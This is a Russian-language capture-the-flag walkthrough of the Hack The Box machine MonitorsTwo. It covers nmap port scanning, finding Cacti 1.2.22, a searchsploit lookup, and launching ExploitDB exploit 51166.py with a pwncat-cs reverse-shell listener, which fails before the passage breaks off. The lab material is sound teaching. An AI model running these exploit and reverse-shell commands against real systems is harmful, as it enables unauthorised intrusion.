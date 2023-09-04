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Проделывать все это мы будем в рамках прохождения тренировочной машины MonitorsTwo с площадки Hack The Box. Уровень ее сложности — легкий.
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.211 monitorstwo.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Сканер находит нам два открытых порта: 22 — служба OpenSSH 8.2p1 и 80 — веб‑сервер Nginx 1.18.0.
Сразу переходим к сайту и видим там форму авторизации.
Ниже указана версия CMS Cacti — 1.2.22.
Точка входа
Первым делом стоит проверить, есть ли для обнаруженного движка уже готовые эксплоиты. Если ты, как и я, используешь Kali Linux, то база эксплоитов ExploitDB у тебя уже есть под рукой. Достаточно вызвать утилиту SearchSploit и указать ключевое слово.
searchsploit Cacti
Видим, что есть эксплоит для подходящей версии Cacti. Он должен дать нам возможность удаленного выполнения кода (RCE). Посмотрим, какая есть дополнительная информация об эксплоите.
searchsploit -p php/webapps/51166.py
Приступаем к эксплуатации. Сначала запустим листенер pwncat-cs для получения реверс‑шелла. А затем и сам эксплоит:
python3 51166.py -u http://10.10.11.211 -p 10.10.14.111 -i 4321
Но в ответ ничего не получаем. Видимо, у нас нет доступа к нужному эндпоинту API. Что ж, придется действовать вручную. Открываем код эксплоита и пробуем повторить шаги.
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